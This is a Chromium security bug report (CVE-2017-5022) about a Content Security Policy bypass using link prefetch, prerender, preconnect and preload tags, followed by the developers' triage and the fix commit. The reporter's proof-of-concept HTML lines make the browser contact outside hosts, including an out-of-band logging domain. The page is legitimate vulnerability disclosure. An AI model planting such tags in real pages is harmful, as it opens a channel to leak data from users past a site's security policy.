663620 - Bypass unsafe-inline mode CSP - chromium

	Project: chromium ▼ Issues People Development process History	Sign in

Starred by 3 users

Status:	Fixed
Owner:	y...@yoav.ws
Closed:	Dec 2016
Cc:	mkwst@chromium.org
Components:	Blink>SecurityFeature
EstimatedDays:	----
NextAction:	----
OS:	All
Pri:	2
Type:	Bug-Security
M-56 Security_Severity-Low Security_Impact-Stable allpublic Via-Wizard-Security Release-0-M56 CVE-2017-5022

Bypass unsafe-inline mode CSP

Reported by masa....@gmail.com, Nov 9 2016

Back to list

UserAgent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36

Steps to reproduce the problem:
PoC 1:
<link rel="prefetch" href="http://linux.im/test_prefetch.jpg">  

PoC 2:
<link rel="prerender" href="http://linux.im">  

PoC 3:
<link rel="dns-prefetch" href="http://linux.im">  

PoC 4:
<link rel="preconnect" href="http://1.111asd1-testcsp.n0tr00t.com">  

PoC 5:
<link rel="preload" href="//linux.im/styles/other.css">  

What is the expected behavior?
Refused to load the  xxxxx

What went wrong?
send a request

Did this work before? N/A 

Chrome version: 54.0.2840.71  Channel: n/a
OS Version: 10.0
Flash Version: Shockwave Flash 23.0 r0

Author: evi1m0
Source: http://paper.seebug.org/91/

Comment 1 by rickyz@chromium.org, Nov 9 2016

Components: Blink>SecurityFeature
Labels: Security_Severity-Low
Owner: mkwst@chromium.org

Hey mkwst@, would you mind taking a look at this one?

Comment 2 by mkwst@chromium.org, Nov 9 2016

Cc: mkwst@chromium.org
Owner: y...@yoav.ws

CSP doesn't restrict `prefetch`, `prerender`, `dns-prefetch`, or `preconnect`. It's arguable that it should (and we're talking some of those in https://github.com/w3c/webappsec-csp/issues/107, where your opinions would certainly be appreciated).

`preload` should require an `as` attribute, and apply policy accordingly. yoav@, can you take a look at whether that's happening?

Comment 3 by y...@yoav.ws, Nov 9 2016

preload should apply policy according to the `as` attribute. If that attribute is missing, the applied policy should be `connect-src`.

Is there a test case that shows that this is not happening?

Project Member Comment 4 by sheriffbot@chromium.org, Nov 9 2016

Status: Assigned

Comment 5 by masa....@gmail.com, Nov 10 2016

Attackers do not need to use the as attribute when attacking

Comment 6 by y...@yoav.ws, Nov 10 2016

True. Again, if that attribute is missing, the applied policy should be `connect-src`. If that's not the case, it's certainly a bug. Is this what you see? Do you have a test case that shows that?

Comment 7 by masa....@gmail.com, Nov 10 2016

See http://45.32.32.225/test.php

Content-Security-Policy:default-src 'self'; content-src 'none'; script-src 'self' 'unsafe-inline';

It can send a request to asd11111111a1121.vqn3j8.ceye.io .

Comment 8 by masa....@gmail.com, Nov 10 2016

PoC:
http://45.32.32.225/test2.php#<link rel=preload href=http://asd11111111a1121.vqn3j8.ceye.io/test.aaa>

Comment 9 by y...@yoav.ws, Nov 10 2016

Status: Started

Can recreate using my own test case.

Comment 10 by rickyz@chromium.org, Nov 11 2016

Labels: -OS-Windows Security_Impact-Stable OS-All

I assume this impacts stable - let me know if I'm mistaken.

Project Member Comment 11 by bugdroid1@chromium.org, Nov 15 2016

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/872f27a9bceebb042082cd1b2f9043e5dd208200

commit 872f27a9bceebb042082cd1b2f9043e5dd208200
Author: yoav <yoav@yoav.ws>
Date: Tue Nov 15 10:07:46 2016

Apply connect-src for link preload with no `as` value

This fixes an issue where connect-src was not applied to preloaded resources, due to their Context.

BUG= 663620 

Review-Url: https://codereview.chromium.org/2491903002
Cr-Commit-Position: refs/heads/master@{#432158}

[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicyTest.cpp

Project Member Comment 12 by bugdroid1@chromium.org, Nov 15 2016

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/872f27a9bceebb042082cd1b2f9043e5dd208200

commit 872f27a9bceebb042082cd1b2f9043e5dd208200
Author: yoav <yoav@yoav.ws>
Date: Tue Nov 15 10:07:46 2016

Apply connect-src for link preload with no `as` value

This fixes an issue where connect-src was not applied to preloaded resources, due to their Context.

BUG= 663620 

Review-Url: https://codereview.chromium.org/2491903002
Cr-Commit-Position: refs/heads/master@{#432158}

[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/872f27a9bceebb042082cd1b2f9043e5dd208200/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicyTest.cpp

Comment 13 by awhalley@chromium.org, Nov 21 2016

Anything else to be done here, or can we mark as Fixed?

Comment 14 by awhalley@chromium.org, Dec 2 2016

Labels: M-56
Status: Fixed

Project Member Comment 15 by sheriffbot@chromium.org, Dec 3 2016

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 16 by awhalley@chromium.org, Jan 24 2017

Labels: Release-0-M56

Comment 17 by awhalley@chromium.org, Jan 25 2017

Labels: CVE-2017-5022

Project Member Comment 18 by sheriffbot@chromium.org, Mar 11 2017

Labels: -Restrict-View-SecurityNotify allpublic

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 19 by mkwst@chromium.org, Jun 19

 Issue 719242  has been merged into this issue.

► Sign in to add a comment